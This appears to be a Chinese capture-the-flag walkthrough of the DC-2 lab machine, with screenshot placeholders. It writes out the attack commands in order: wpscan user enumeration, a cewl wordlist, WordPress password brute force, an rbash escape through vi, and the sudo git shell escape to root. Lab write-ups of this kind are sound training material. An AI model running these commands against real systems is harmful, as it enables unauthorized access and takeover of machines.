靶机 DC-2

DC_2

信息搜集

存活检测

靶机 DC-2_第1张图片

详细扫描

靶机 DC-2_第2张图片

添加 host

靶机 DC-2_第3张图片

后台网页扫描

靶机 DC-2_第4张图片

网页信息搜集

  • 主页面

    找到 flag1,提示使用 cewl 密码生成工具

    靶机 DC-2_第5张图片

  • wp 登陆界面

    靶机 DC-2_第6张图片

  • 使用 wpscan 扫描用户

    wpscan --url http://dc-2/ --enumerate u 
    

    扫描出用户 tom、jerry、admin

    靶机 DC-2_第7张图片

  • 将三个用户名写入文件中以供密码爆破

    靶机 DC-2_第8张图片

  • 根据网页信息生成密码字典

    cewl http://dc-2/ -w mima.txt
    

    image-20231022162647110

  • 爆破

    wpscan --url http://dc-2/ --passwords mima.txt --usernames username
    
  • 成功爆破出 tom 和 jerry 的密码

    jerry,adipiscing
    tom,parturient
    

    靶机 DC-2_第9张图片

  • 网页登录

    靶机 DC-2_第10张图片

  • flag2

    靶机 DC-2_第11张图片

    靶机 DC-2_第12张图片

    提示可以使用其他方法

ssh 登录

  • 使用之前爆破出的账密

    尝试 jerry

    靶机 DC-2_第13张图片

    登陆失败

  • 尝试 tom

    靶机 DC-2_第14张图片

    成功登录

  • 找到第三个 flag,但查看时显示被 rbash 限制

    image-20231022164114605

    rbash(Restricted Bash)是一种受限制的交互式 shell,它是 Bash shell 的一个变种。rbash 提供了一种限制用户的能力,以便他们只能在受限的环境中执行特定的操作

  • 查看可以使用的命令

    compgen -c
    

    靶机 DC-2_第15张图片

  • 发现可以使用 vi 命令

    image-20231022164348020

  • 尝试使用 vi 命令查看 flag3

    靶机 DC-2_第16张图片

    提示 tom 使用 su

  • su

    还是被限制

部分提权

  • rbash 绕过

    # vi进入末行之后
    :set shell=/bin/bash
    :shell
     
    # 切换完成之后还要添加环境变量。给$PATH变量增加两个路径,用来查找命令
    export PATH=$PATH:/bin/
    export PATH=$PATH:/usr/bin/
    

    image-20231022172557186

  • 切换 jerry 用户

    成功切换

    image-20231022172855484

  • jerry 家目录下拿到第四个 flag

    靶机 DC-2_第17张图片

    提示 git

提权

  • sudo -l 查看权限

    image-20231022173243685

  • [git 提权](git | GTFOBins)

    sudo git -p help config
    !/bin/sh
    

    靶机 DC-2_第18张图片

    成功 root

  • final-flag

    靶机 DC-2_第19张图片

总结

  • wpscan 扫描用户名、爆破
  • cewl 根据网页搜集密码
  • rbash 绕过
  • git 提权

你可能感兴趣的:(渗透测试,网络,网络安全,web安全,安全)